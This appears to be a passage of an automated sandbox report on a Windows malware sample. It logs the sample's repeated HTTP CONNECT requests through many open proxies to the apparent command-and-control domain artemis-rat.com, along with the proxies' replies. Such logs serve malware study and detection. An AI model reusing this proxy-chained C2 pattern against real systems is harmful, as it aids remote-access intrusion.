6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              123192.168.2.45028138.162.29.14531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.520869017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.939133883 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              124192.168.2.45028938.162.25.1931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.527209044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.951132059 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              125192.168.2.450222147.75.34.86100087284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.537499905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.843034029 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              126192.168.2.45020231.148.207.153807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.542934895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              127192.168.2.45017165.1.40.4710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.555330992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.952069998 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              128192.168.2.45018891.134.140.160122177284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.555466890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.319298029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.444320917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866575956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.356976032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.866492987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366465092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.368283987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.164253950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              129192.168.2.450276177.234.194.1569997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.560344934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.163047075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.959992886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.553796053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.866741896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163659096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.349219084 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              130192.168.2.450168187.40.1.1231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.562359095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.010826111 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:55.656735897 CET1286INHTTP/1.1 500 Internal Server Error
                                              Server: squid/5.2
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:53 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 17038
                                              X-Squid-Error: ERR_CANNOT_FORWARD 0
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 27 44 65 6a 61 56 75 20 53 61 6e 73 27 2c 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 76 69 73 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 63 37 63 61 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 74 69 63 65 6e 63 69 61 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 20 65 6c 6c 69 70 73 69 73 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 39 36 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 77 69 64 74 68 3a 35 30 30 70 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 38 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 0a 3c 69 6d 67 20 63 6c 61 73 73 3d 22 64 65 6e 79 5f 6c 6f 67 6f 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4e 63 41 41 41 41 76 43 41 59 41 41 41 42
                                              Data Ascii: <!DOCTYPE html><html style="background-color: #f9f9f9 !important;font-family:Segoe, 'Segoe UI', 'DejaVu Sans', 'Trebuchet MS', Verdana, sans-serif;"> <head> <meta charset="UTF-8"> <title>Aviso</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no' name='viewport'> <style> html{background: #3c7ca0 !important;} body{background: transparent !important;height: 100%;} .reticencias { text-overflow: ellipsis; white-space: nowrap; overflow: hidden; width:96%; margin-bottom:0 !important; } </style> </head> <body id="ERR_CANNOT_FORWARD" style="font-size:12px; "> <div class="container" align="center"> <div class="row" style="min-width:500px"> <div class="col-xs-8" style="text-align:center;padding-top:50px; padding-bottom:10px"><img class="deny_logo" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANcAAAAvCAYAAAB


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              131192.168.2.450252185.103.101.39100517284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.581767082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.913368940 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              132192.168.2.45019991.134.140.16054017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.582062006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.319267988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.397438049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.554110050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866709948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.163384914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.460295916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              133192.168.2.45027420.111.54.16807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.584587097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.877126932 CET319INHTTP/1.1 403 Forbidden
                                              Server: squid
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 17
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              X-Cache: MISS from cdn-fintech.info
                                              X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                              Connection: keep-alive
                                              Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                              Data Ascii: ERR_ACCESS_DENIED


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              134192.168.2.450230103.217.217.19080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.585767031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.946595907 CET202INHTTP/1.0 403 Forbidden
                                              Content-Length: 712
                                              Content-Type: text/html
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Expires: Mon, 11 Mar 2024 07:37:17 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              135192.168.2.45026292.205.61.38360737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.586757898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.256793976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.178730965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.092227936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846518993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554297924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.362646103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.757364035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.475649118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              136192.168.2.45031198.188.47.13241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.587722063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


